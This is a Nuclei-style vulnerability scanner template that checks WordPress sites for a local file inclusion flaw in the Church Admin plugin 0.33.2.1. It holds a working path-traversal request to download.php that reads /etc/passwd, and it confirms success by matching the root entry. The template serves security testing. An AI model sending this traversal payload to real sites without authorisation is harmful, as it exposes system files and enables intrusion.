id: church-admin-lfi

info:
  name: WordPress Church Admin 0.33.2.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php.
  reference:
    - https://wpscan.com/vulnerability/8997
    - https://id.wordpress.org/plugins/church-admin/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,wpscan

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100abce97693cbb65c18c2c9ab2cacdda465f8a4e8783740e7cf6622fabb78f514c022100d77941908fd7b4ac39df5e3b3f6bd6c72be9247b0ca95d9e84c2b8db94809181:922c64590222798bb761d5b6d8e72950
